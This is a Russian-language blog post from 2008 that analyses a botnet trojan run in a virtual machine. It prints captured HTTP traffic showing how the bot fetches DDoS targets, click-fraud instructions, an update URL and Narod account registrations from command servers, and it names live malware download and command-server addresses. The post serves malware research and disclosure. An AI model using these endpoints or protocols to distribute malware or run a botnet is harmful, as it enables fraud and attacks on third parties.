Neosap.ru! спаси РУнет (и попутно Народ и Директ)

При разбирательстве с очередной DDOS атакой к нам подключилось еще больше желающих помочь

навести порядок. Будем надеятся, что и Neosap.ru нам не откажет в этой помощи, а заодно и прокомментирует изложенные ниже сведения.

В чем смысл SEO? Понаставить ссылок? Понаделать дорвеев? Настоящие SEO должны использовать все методы! В этот час, когда все плохие парни спят после неустанной борьбы с антивирусным ПО, мы хотим поведать очередную историю о жизни одного маленького ботнета. Все ссылки, которые размещены ниже, должны использоваться с максимальной осторожностью, на свой страх и риск!

Отправной точкой в этой истории должно быть не место, где раздают злополучный вирус

(http://redirtraftospon.com/40/), а неприметный URLик http://stopddos.ru/current/ и письма владельцев зараженных компьютеров, которые обнаружили там свои IP адреса. Но если всё описывать, то до места и конкретной инструкции по спасению РУнета господа из Neosap устанут читать.

Если мы все правильно сделаем и не попадемся на уловки для отсечения любопытных, то с http://redirtraftospon.com/40/ нам выпадет замечательнейший файл под названием secret-porn-video.zip. Самое главное в нашем нелегком деле - это скачать его мимо антивирусного ПО, которое противно визжит, и доставить его в какую-то виртуальную среду, где эта гадость не сможет нам причинить вред. Прошу очень внимательно отнестись к использованию "контрацептивов", т.к. при исследовании данных ссылок пострадал уже не один любопытный. Будем надеятся, что после полного реинсталла системы они вернутся в строй.

После распаковки и подготовочных к логгированию трафика работ мы можем смело запускать этот файл и участвовать в шоу. Первым, что нас слегка шокирует, будет предложение ввести каптчу. А зачем? Ну да ладно, потом из дампа трафика поймем куда это всё и зачем уходит. После ввода каптчи можно пойти куда-то попить кофе, т.к. данному ПО предстоит нелегкая задача - зарегистрировать аккаунт на Народе, покликать какой-то адалт, скачать сгенерированный дорвей c http://1gost.info/getdor.php, поучавствовать в ДДОС на один строительный сайт, покликать по Яндекс.Директ и покрутить пользователю порнушку. Думаете это всё? Пик кульминации и общий хохот наступает в момент инсталлирования XP Antivirus, который на ваших глазах находит 62 трояна и предлагает их вычистить после введения активационного кода.

Однако, эффективная модель продаж у этого XP Antivirus! Ну ничего, у господ из Neosap.ru еще есть возможность подгрузить им таблэтку от Касперского.

Модем устал качать, а мы устали ждать... пора уже в нашем Ethereal нажимать на Stop, а в VMware гасить это безобразие и подходить к задаче спасения всея РУнета, Народа и партнеров Директа. Более 30 мегабайтов бардака! Что? Зачем? Почему? Столько знакомых доменов, тематик и надо бы с чего-то начать. Если мы посмотрим на заголовок, то мы конечно же должны понять каким тут боком этот neosap.ru - введем 'ip.dst == 217.16.30.51' в Ethereal и посмотрим что получилось.

GET /surf/stat.php?uin= HTTP/1.1

Host: neosap.ru

Accept: text/html, */*

User-Agent: Mozilla/3.0 (compatible; Indy Library)



HTTP/1.1 403 Forbidden

Date: Tue, 22 Apr 2008 14:47:03 GMT

Server: Apache

Content-Length: 215

Content-Type: text/html; charset=iso-8859-1

GET /surf/stat.php?uin=19.04.20081564111383201175 HTTP/1.1

Host: neosap.ru

Accept: text/html, */*

User-Agent: Mozilla/3.0 (compatible; Indy Library)



HTTP/1.1 403 Forbidden

Date: Tue, 22 Apr 2008 14:47:13 GMT

Server: Apache

Content-Length: 215

Content-Type: text/html; charset=iso-8859-1

"Ах... какая досада" - ответил HTTP сервер neosap.ru. "Вот фигня!" - подумали мы. Ну ничего, мы разберемся зачем оно туда ходит. Покрутившись по дампу мы конечно же заметим нечто похожее, можно даже сказать, байт в байт идентичное, но для ленивых мы предложим ввести "ip.dst == 88.214.202.8" в уже извественое поле ввода. И что мы видим?

GET /surf/stat.php?uin= HTTP/1.1

Host: super-tds.info

Accept: text/html, */*

User-Agent: Mozilla/3.0 (compatible; Indy Library)



HTTP/1.1 200 OK

Date: Tue, 22 Apr 2008 15:00:24 GMT

Server: Apache/1.3.39 (Unix) PHP/4.4.8

X-Powered-By: PHP/4.4.8

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html



2  

OK

0

GET /surf/stat.php?uin=19.04.20081564111383201175 HTTP/1.1

Host: super-tds.info

Accept: text/html, */*

User-Agent: Mozilla/3.0 (compatible; Indy Library)



HTTP/1.1 200 OK

Date: Tue, 22 Apr 2008 15:00:34 GMT

Server: Apache/1.3.39 (Unix) PHP/4.4.8

X-Powered-By: PHP/4.4.8

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html



2  

OK

0

GET /surf/updinfo.php HTTP/1.1

Host: super-tds.info

Accept: text/html, */*

User-Agent: Mozilla/3.0 (compatible; Indy Library)



HTTP/1.1 200 OK

Date: Tue, 22 Apr 2008 15:00:35 GMT

Server: Apache/1.3.39 (Unix) PHP/4.4.8

X-Powered-By: PHP/4.4.8

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html



3d 

lastver=70

updurl=http://1-ru.com/1233.pdf

updsize=325120



0

"Вау! Нас тут знают", - подумали мы и начали изучать дальше. Мы не стали проверять, что конкретно отдает в '/surf/updinfo.php' neosap.ru, т.к. получили ответ отличный от 403 и браузером туда ползти не рискнули.

GET /surf/surf.php?version=150 HTTP/1.1

Host: super-tds.info

Accept: text/html, */*

User-Agent: Mozilla/3.0 (compatible; Indy Library)



HTTP/1.1 200 OK

Date: Tue, 22 Apr 2008 15:00:35 GMT

Server: Apache/1.3.39 (Unix) PHP/4.4.8

X-Powered-By: PHP/4.4.8

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html



10f

defpref=

queryinterval=5

longqueryinterval=90

url=http://redirtraftospon.com/27/

referer=http://sexo-monster.com/

acceptlanguage=en-us

runjava=yes

clurl=http://www.yondi.ru/inner_c_article_id_825.phtm

clreferer=http://[dsfd[fsdfsdf[.ru/
clinc=an.yandex

clexc=



0

Вот мы и нашли указание для ДДОСа на yondi.ru и кликам по Яндекс.Директ. Если мы пороемся дальше, то найдем и указание для регистрации на Народ-е:

GET /surf/addacc.php?username=cpwmgv30&password=biyqxmxp&ftppassword=biyqxmxp&host=narod HTTP/1.1

Accept: */*

Accept-Language: ru

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: super-tds.info

Connection: Keep-Alive



HTTP/1.1 302 Found

Date: Tue, 22 Apr 2008 15:00:43 GMT

Server: Apache/1.3.39 (Unix) PHP/4.4.8

X-Powered-By: PHP/4.4.8

Location: http://1gost.info/getdor.php

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html



0

«И куда это нас в очередной раз послало?» - обратили внимание на 302 ответ.

Конечно же, нас вернуло в нашу отправную точку, незаметному http://stopddos.ru/current/ и ДДОСу на ресурс строительной тематики, запросы на который исправно прослеживаются в дампе. Мы можем очень долго анализировать эту грязь, но факт остается фактом — кнопка для спасения десятков тысяч «зараженных» пользователей в руках администраторов и программистов neosap.ru.

Итак, мы заранее преклоняемся перед нераскрытыми талантами этой команды и просим их помощи. Обычной такой помощи, всего-то надо оповестить этих пользователей, которые так рьяно пытаются добиться от их сервера кода ответа отличного от 403, и помочь им установить какой-то более разумный антивирус, само собой без их ведома. Возможно, обратиться за помощью к сотрудникам антивирусной компании или ДЦ, ну, или к тому, кто всю эту кашу заварил, если таковой имеется в вашем коллективе или присутствует среди партнеров.

Если у кого-то не получилось поучаствовать в шоу из-за заметания следов, то ссылочку на душевно упакованную грязь и дампы мы конечно же скинем. А те компьтеры, которые жаждут инструкций от HTTP сервера neosap.ru уже никуда не спрячешь.

Давайте это обсудим?